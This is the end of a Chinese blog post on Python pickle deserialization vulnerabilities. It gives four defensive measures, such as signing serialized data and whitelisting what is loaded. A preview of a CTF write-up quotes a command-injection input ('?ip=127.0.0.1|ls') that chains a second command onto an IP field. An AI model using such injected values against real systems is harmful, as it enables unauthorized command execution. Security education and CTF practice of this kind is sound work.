<h2 id="Python-反序列化漏洞如何防御"><a href="#Python-反序列化漏洞如何防御" class="headerlink" title="Python 反序列化漏洞如何防御"></a><strong>Python 反序列化漏洞如何防御</strong></h2><p>(1) 不要在不守信任的通道中传递 pcikle 序列化对象<br>(2) 在传递序列化对象前请进行签名或者加密，防止篡改和重播<br>(3) 如果序列化数据存储在磁盘上，请确保不受信任的第三方不能修改、覆盖或者重新创建自己的序列化数据<br>(4) 将 pickle 加载的数据列入白名单</p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference:"></a>Reference:</h2><p>[1]<a href="https://zhuanlan.zhihu.com/p/89132768" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/89132768</a></p>
<p>[2]一篇文章带你理解漏洞之Python 反序列化漏洞(<a href="https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BPython%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BPython%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/</a>)</p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">V1cuna</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://hackyangtuo.top/posts/c1a1.html">https://hackyangtuo.top/posts/c1a1.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">V1cuna</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E6%80%BB%E7%BB%93/">
                                    <span class="chip bg-color">-python反序列化 -总结</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/posts/ab7.html">
                    <div class="card-image">
                        
                        
                        <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/featureimages/6.jpg" class="responsive-img" alt="Immerse In BUU Day1">
                        
                        <span class="card-title">Immerse In BUU Day1</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            刚弄好新博客，慢慢来刷题了。
Web[GXYCTF2019]Ping Ping Ping命令注入，?ip=127.0.0.1|ls发现存在flag.php和index.php,cat的时候发现各种口吐芬芳，手动fuzz了一下发现ban掉了f
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-05-04
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            V1cuna
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                    <a href="/tags/WP/">
                        <span class="chip bg-color">WP</span>
                    </a>
                    
                    <a href="/tags/BUU/">
                        <span class="chip bg-color">BUU</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                本篇&nbsp;<i class="far fa-dot-circle"></i>
            </div>
            <div class="card">
                <a href="/posts/c1a1.html">
                    <div class="card-image">
                        
                        
                        <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/featureimages/23.jpg" class="responsive-img" alt="学习python反序列化">
                        
                        <span class="card-title">学习python反序列化</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            0X01:Pickle是干什么用的：序列化、反序列化　　在很多任务中，我们可能会需要把一些内容存储起来，以备后续利用。如果我们要存储的内容只是一条字符串或是数字，那么我们只需要把它写进文件就行。然而，如果我们需要存储的东西是一个dict、一
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-05-02
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            V1cuna
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E6%80%BB%E7%BB%93/">
                        <span class="chip bg-color">-python反序列化 -总结</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="/about" target="_blank">V1cuna</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/V1cuna" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:842731085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=842731085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 842731085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/materialize/materialize.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/aos/aos.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
